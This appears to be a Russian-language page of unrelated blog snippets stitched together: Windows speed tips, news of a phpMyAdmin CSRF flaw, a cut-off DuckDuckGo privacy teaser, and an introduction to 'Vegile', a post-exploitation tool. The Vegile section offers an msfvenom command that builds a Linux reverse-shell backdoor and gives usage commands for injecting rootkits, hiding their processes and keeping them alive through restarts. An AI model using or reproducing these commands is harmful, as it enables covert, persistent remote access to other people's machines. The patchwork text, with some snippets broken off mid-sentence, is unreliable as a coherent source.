Быстрое завершение работы системы Windows, как и быстрый её запуск — важный показатель эффективной работы ПК, ноутбука или планшета. Он говорит о том, что Windows в хорошем состоянии и всегда к вашим услугам для решения любого срочного вопроса по работе и не только.
«Торможение» компьютера или ноутбука всегда вызывает негативные эмоции. Зачастую от этой проблемы страдает не только нервная система пользователя, но и само устройство. На самом деле решение довольно простое: нужно всего лишь проверить производительность устройства и повысить её. Сделать это несложно даже новичку. Главное — разобраться с элементами, которые не дают «разогнать» операционную систему на полную мощность или препятствуют её работе. После устранения причины зависания ваше устройство будет «летать».
Автор: Владимир Моденов
PhpMyAdmin – наиболее распространенная тулза для администрирования MySQL и MariaDB через веб-интерфейс. Огромное множество сайтов, особенно на хостингах, имеют ее в своем составе.
И вот внезапно, в столь широко используемой и вроде протестированной вдоль и поперек штуке, обнаруживается CSRF!
Для тех, кто далек от веба: CSRF – провокация пользователя на отправку веб-запроса с параметрами, заданными хакером, из браузера пользователя. При этом используется сессия пользователя. А отправка запроса может происходить автоматически при заходе на контролируемую хакером страницу.
В данном конкретном случае CSRF позволяет удалить таблицы и данные из базы данных.
Ну ниче, жить еще можно, если есть бэкап.
Дыра пофикшена в уже выпущенной версии 4.7.7 phpMyAdmin. Но обновились еще точно не все, так что взломщики могут пошалить с публичными сайтами.
Источник https://t.me/informhardening
Существует множество мифов, связанных с вопросами приватности. И команда конфиденциального поисковика DuckDuckGo решила разобраться, какие из них выдумка, а какие действительно могут оказаться правдой. Перевод заметки из официального блога компании. Мифы о приватности:№2. Мой пароль надёжно защищает мои учётные записи! Если для разных сайтов вы используете один и тот же пароль, все
Автор: Alex Semёnov-Sherin
Дата публикации: 2018-01-16T18:36:00.001+07:00
Vegile – Призрак в шелле
Vegile – это инструмент для работы в Postfix.
Технология Post Exploitation гарантирует, что мы поддержим некоторый уровень доступа и потенциально может привести к более глубоким позициям в нашей целевой сети.
Этот инструмент будет настраивать ваш backdoor / rootkits, b когда бэкдор уже настроит его, будет скрыт ваш процесс sposeifc, неограниченный и прозрачный сеанс в metasploit.
Даже когда он будет убит, он снова запустится.
Вы можете использовать thefatrat для помощи в создании простого бэкдора:
# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "x00" -f elf -o NAME_BACKDOOR
Для скрытого процесса,вы можете использовать руткиты, бэкдоры, и ботнет {sh, python, perl, exe и binary}.
Целевые жертвы для всех дистрибутивов Linux включают (base32 и base64 в их системе)
Для получения атозапуска вы можете использовать crontab и xinit.d в своем бэкдоре.
# git clone https://github.com/Screetsec/Vegile.git # cd Vegile # chmod +x Vegile
Запуск Vegile без каких-либо параметров даст полезный список наиболее распространенных опций. вы можете использовать команду:
# Vegile -i / --inject [backdoor/rootkit] # Vegile -u / --unlimited [backdoor/rootkit] # Vegile -h / --help